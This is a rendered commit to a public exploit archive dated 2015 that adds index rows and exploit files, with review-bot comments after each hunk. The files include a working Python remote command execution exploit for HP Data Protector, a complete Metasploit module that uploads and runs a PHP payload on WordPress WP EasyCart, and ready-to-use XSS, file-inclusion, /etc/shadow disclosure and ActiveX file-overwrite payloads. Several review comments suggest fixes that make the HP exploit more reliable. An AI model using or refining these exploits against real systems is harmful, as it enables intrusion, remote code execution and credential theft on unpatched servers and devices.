Update: 2015-02-12

11 new exploits
Offensive Security 2015-02-12 08:36:52 +00:00
parent 4e0a333e52
commit cdf0a2fade
12 changed files with 365 additions and 1 deletion


@ -32467,7 +32467,6 @@ id,file,description,date,author,platform,type,port
36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow PoC",2015-02-09,"Samandeep Singh",windows,dos,0
36023,platforms/php/webapps/36023.txt,"Redaxscript CMS 2.2.0 - SQL Injection Vulnerability",2015-02-09,"ITAS Team",php,webapps,0
36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption Vulnerability",2015-02-08,"Pablo González",linux,dos,0
36025,platforms/php/webapps/36025.txt,"u5CMS 3.9.3 - Multiple Open Redirect Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36026,platforms/php/webapps/36026.txt,"u5CMS 3.9.3 - (deletefile.php) Arbitrary File Deletion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
36027,platforms/php/webapps/36027.txt,"u5CMS 3.9.3 - Multiple SQL Injection Vulnerabilities",2015-02-09,LiquidWorm,php,webapps,0
36028,platforms/php/webapps/36028.txt,"u5CMS 3.9.3 - (thumb.php) Local File Inclusion Vulnerability",2015-02-09,LiquidWorm,php,webapps,0
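Review bot: the hunk header says this range shrank from 7 lines to 6, yet all seven rows shown (36022 through 36028) appear without a deletion marker in this rendering, so the one row that files.csv loses cannot be identified from the diff. The commit message should name the id that was dropped and why (the summary counts exactly one deletion for the whole changeset), otherwise the next person to reconcile the CSV against platforms/ has to diff the parent commit by hand.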
@ -32483,3 +32482,13 @@ id,file,description,date,author,platform,type,port
36039,platforms/php/webapps/36039.txt,"Wordpress Theme Divi Arbitrary File Download Vulnerability",2015-02-09,"pool and Fran_73",php,webapps,0
36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80
36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80
36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 Multiple Cross Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0
36046,platforms/php/webapps/36046.txt,"phpWebSite 'page_id' Parameter Cross Site Scripting Vulnerability",2011-08-17,Ehsan_Hp200,php,webapps,0
36047,platforms/php/webapps/36047.txt,"awiki 20100125 Multiple Local File Include Vulnerabilities",2011-08-15,muuratsalo,php,webapps,0
36048,platforms/php/webapps/36048.txt,"PHPList 2.10.x Security Bypass and Information Disclosure Vulnerabilities",2011-08-15,"Davide Canali",php,webapps,0
36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2011-08-17,"High-Tech Bridge SA",windows,remote,0
36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 'index.php' Cross Site Scripting Vulnerability",2011-08-17,"High-Tech Bridge SA",php,webapps,0
36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0
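Review bot: the row count does not match the commit message: this hunk adds ten rows (36042 through 36051) while the message says "11 new exploits", and the changeset also adds platforms/hp-ux/remote/35961.py, which has no row here. Either 35961 already had an entry and the message should say ten, or its row is missing from files.csv. Also the port column is inconsistent within the same class of entry: 36043 gets 80 while the other PHP webapp rows 36044 through 36051 get 0; pick one convention for web application entries.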


platforms/cgi/remote/36045.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/49160/info
SurgeFTP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SurgeFTP 23b6 is vulnerable; other versions may also be affected.
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&last="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&class_name="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=report_file&domainid=0&filter="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=user_admin&domainid="<script>alert('XSS');</script>
http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid="<script>alert('XSS');</script>
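Review bot: the six PoC URLs carry a raw `"` and an unencoded `<script>` tag rather than percent-encoded values, and nothing in the text says whether surgeftpmgr.cgi answers without an administrator session, which decides whether this is reflected XSS that needs a logged-in admin to click or something reachable pre-authentication. Add the encoded form of at least one request as actually sent and one sentence on the authentication context; the `cmd=user_admin&domainid=` variant in particular reads as an admin-only handler.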

platforms/hardware/webapps/36042.txt

@ -0,0 +1,27 @@
----------------------------------------------------------------------
Title : LG DVR LE6016D - Remote File Disclosure Vulnerability (0day)
CVE-ID : none
Product : LG
Affected : All versions
Impact : Critical
Remote : Yes
Product link: http://www.lgecommercial.com/security-en/products/analog-product/analog-dvr/lg-LE6016D
Reported : 10/02/2015
Author : Yakir Wizman, yakir.wizman@gmail.com
Vulnerability description:
----------------------------------------------------------------------
No authentication (login) is required to exploit this vulnerability.
The LG DVR application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve stored files on server such as '/etc/passwd' and '/etc/shadow' by using a simple url request which made by browser.
More over, an attacker may be able to compromise encrypted login credentials for or retrieve the device's administrator password allowing them to directly access the device's configuration control panel.
Proof of concept:
----------------------------------------------------------------------
The following simple url request will retrieve '/etc/shadow' file:
http://127.0.0.1:1234/etc/shadow
~eof.
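Review bot: "Affected : All versions" contradicts the title, which names a single model, LE6016D, and the proof of concept does not identify the vulnerable service: `http://127.0.0.1:1234/etc/shadow` uses a loopback address and an arbitrary port, and it does not say whether the DVR's HTTP daemon simply exposes the filesystem root or whether a traversal prefix was stripped from the request as written. State the port the device listens on, the exact request that returned the file, and the firmware version tested; "More over" should read "Moreover", and "compromise encrypted login credentials" should say plainly that /etc/shadow yields password hashes to crack offline.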

platforms/hp-ux/remote/35961.py Executable file

@ -0,0 +1,69 @@
#!/usr/bin/python
# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"
import socket
import struct
import sys
def exploit(host, port, command):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
print "[+] Target connected."
OFFSET_DEC_START = 133
OFFSET_DEC = (OFFSET_DEC_START + len(command))
# print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
# print "len(command)" + str(len(command))
# print "OFFSET_DEC" + str(OFFSET_DEC)
OFFSET_HEX = "%x" % OFFSET_DEC
# print "OFFSET_HEX" + str(OFFSET_HEX)
OFFSET_USE = chr(OFFSET_DEC)
# print "Command Length: " + str(len(command))
PACKET_DATA = "\x00\x00\x00"+\
OFFSET_USE+\
"\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
"\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
"\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
"\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
"\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
"\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
"\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
"\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
" %s\x00" %command
# Send payload to target
print "[+] Sending PACKET_DATA"
sock.sendall(PACKET_DATA)
# Parse the response back
print "[*] Result:"
while True:
response = sock.recv(2048)
if not response: break
print response
except Exception as ex:
print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
exit(-3)
sock.close()
if __name__ == "__main__":
try:
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]
exploit(target, port, command)
except IndexError:
print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
exit(0)
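Review bot: the length field is computed incorrectly for anything but short commands: the four-byte header is built as `"\x00\x00\x00" + chr(OFFSET_DEC)`, so only the low byte of the length is emitted, and `chr()` raises ValueError as soon as 133 + len(command) exceeds 255, i.e. for any command longer than 122 bytes. `struct` is imported for exactly this purpose and `OFFSET_HEX` is computed but never used; replace the three OFFSET lines with `struct.pack('>I', OFFSET_DEC)` and delete OFFSET_HEX. Minor: the except branch calls `exit(-3)` before `sock.close()`, and the print statements make this Python 2 only, which the header comments should say.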

platforms/php/webapps/36043.rb Executable file

@ -0,0 +1,171 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress WP EasyCart Unrestricted File Upload',
'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
WordPress contains a flaw that allows a remote
attacker to execute arbitrary PHP code. This
flaw exists because the
/inc/amfphp/administration/banneruploaderscript.php
script does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the web
server.
In versions <= 3.0.8 authentication can be done by
using the WordPress credentials of a user with any
role. In later versions, a valid EasyCart admin
password will be required that is in use by any
admin user. A default installation of EasyCart will
setup a user called "demouser" with a preset password
of "demouser".},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '116806'],
['WPVDB', '7745']
],
'DisclosureDate' => 'Jan 08 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wp-easycart', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']),
OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']),
OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']),
OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false])
], self.class)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def ec_password
datastore['EC_PASSWORD']
end
def ec_password_is_hash
datastore['EC_PASSWORD_IS_HASH']
end
def use_wordpress_authentication
username.to_s != '' && password.to_s != ''
end
def use_ec_authentication
ec_password.to_s != ''
end
def req_id
if ec_password_is_hash
return ec_password
else
return Rex::Text.md5(ec_password)
end
end
def generate_mime_message(payload, date_hash, name, include_req_id)
data = Rex::MIME::Message.new
data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
data
end
def setup
if !use_wordpress_authentication && !use_ec_authentication
fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
end
super
end
def exploit
vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication
if use_wordpress_authentication && use_ec_authentication
print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...")
end
if use_wordpress_authentication
print_status("#{peer} - Authenticating using #{username}:#{password}...")
cookie = wordpress_login(username, password)
if !cookie
if use_ec_authentication
print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
else
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
end
else
print_good("#{peer} - Authenticated with WordPress")
end
end
print_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha(10)
date_hash = Rex::Text.md5(Time.now.to_s)
uploaded_filename = "#{payload_name}_#{date_hash}.php"
plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)
print_status("#{peer} - Uploading payload to #{payload_url}")
res = send_request_cgi(
'method' => 'POST',
'uri' => uploader_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
print_status("#{peer} - Executing the payload...")
register_files_for_cleanup(uploaded_filename)
res = send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)
if !res.nil? && res.code == 404
print_error("#{peer} - Failed to upload the payload")
else
print_good("#{peer} - Executed payload")
end
end
end
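Review bot: the success check at the end of `exploit` is too lenient: a non-200 response to the upload POST is only reported through `vprint_error`, which is silent unless VERBOSE is set, and execution continues; the final GET then treats anything other than a 404 as success, so a 403 or 500 from the payload URL prints "Executed payload". Suggest `fail_with(Failure::UnexpectedReply, ...)` when `res.code != 200` after the upload, and checking the payload request for `res.code == 200` (or for the session) rather than only for 404. Also the three-line `if ec_password_is_hash ... end` in `req_id` can be the one-liner `ec_password_is_hash ? ec_password : Rex::Text.md5(ec_password)`.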

platforms/php/webapps/36044.txt

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49138/info
PHP Flat File Guestbook is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell?
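Review bot: the PoC `ffgb_admin.php?book_id=http://shell?` is a placeholder with no statement of the server-side precondition: a remote include through include()/require() only works when allow_url_include is on, which has been off by default since PHP 5.2, so the advisory should say so. It should also state the affected version (the CSV row calls it 1.0; the body names none) and what `book_id` is concatenated into, since that decides whether the trailing `?` trick is needed.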

platforms/php/webapps/36046.txt

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/49176/info
phpWebSite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/mod.php?mod=userpage&page_id=[XSS]
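Review bot: the entry gives neither an affected version nor a concrete payload: `page_id=[XSS]` is a placeholder, and the description does not say whether the value is reflected into element text or into an attribute, which determines the payload that actually fires. Replace `[XSS]` with the encoded string that was verified and add the phpWebSite version tested (the CSV row has none either).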

platforms/php/webapps/36047.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/49187/info
awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
awiki 20100125 is vulnerable; other versions may also be affected.
http://www.example.com/awiki/index.php?page=/etc/passwd
http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd
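Review bot: the second PoC depends on a localized action label, `action=Editar+el+Motor`, so it only reproduces on a Spanish-language install; name the handler that `scriptname` reaches so the request can be rebuilt for any locale. For both URLs it is also worth one sentence on whether awiki appends an extension or directory prefix to the parameter, because `page=/etc/passwd` as written implies the value is handed to include() unchanged.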

platforms/php/webapps/36048.txt

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/49188/info
PHPList is prone to a security-bypass vulnerability and an information-disclosure vulnerability.
An attacker can exploit these issues to gain access to sensitive information and send arbitrary messages to registered users. Other attacks are also possible.
http://www.example.com/lists/?p=forward&uid=VALID_UID&mid=ID
http://www.example.com/lists/?p=forward&uid=foo&mid=ID
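Review bot: the two URLs are given without saying which demonstrates which issue. Presumably `uid=VALID_UID` with a message id shows the forwarding of arbitrary messages to registered users (the bypass) and `uid=foo` shows the information disclosure when an invalid uid is supplied, but the text never states what the server returns in either case. Add one line per request describing the observed response, and name the 2.10.x release tested.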

platforms/php/webapps/36050.txt

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49193/info
The Fast Secure Contact Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Fast Secure Contact Form 3.0.3.2 are vulnerable.
http://www.example.com/wp-content/plugins/si-contact-form/captcha/test/index.php/%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E
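Review bot: the payload on the PoC line is broken: `document.coo kie` contains a space, so the request as written does not produce the cookie alert; it should read `document.cookie`. Also worth one sentence: the injection lands in the PATH_INFO after `index.php/`, not in a query parameter, which matters for anyone writing a detection rule that only inspects the query string.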

platforms/php/webapps/36051.txt Executable file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/49197/info
WP-Stats-Dashboard is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
WP-Stats-Dashboard 2.6.5.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]
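Review bot: the eight PoCs request `view/admin/*.php` files directly under wp-content/plugins rather than through a wp-admin page, so the advisory should state explicitly that these scripts run without a WordPress login (no ABSPATH or capability check), since that is what makes the reflected XSS reachable pre-authentication. The select-trend.php payload also omits the leading `%22` the others use; say whether `onchange` is reflected unquoted, or correct the payload.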

platforms/windows/remote/36049.html

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49192/info
StudioLine Photo Basic ActiveX is prone to an arbitrary-file-overwrite vulnerability.
Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
StudioLine Photo Basic 3.70.34.0 is vulnerable; other versions may also be affected.
<html> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_corrupt_or_create" arg2=True target.EnableLog arg1 ,arg2 End Sub </script> </html>
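Review bot: the HTML PoC is collapsed onto a single line and the markup is malformed: `<object ... />` self-closes and is then followed by `</object>`, which Internet Explorer tolerates but which should be fixed, and `arg1` is left as the placeholder `FilePath\File_name_to_corrupt_or_create` without saying what EnableLog writes to that path (emptied, truncated, or overwritten with log content). Restore the line breaks, state the observed effect on the target file, and name the control's DLL in the body (the CSV row says NMSDVDXU.dll; the text only gives the CLSID).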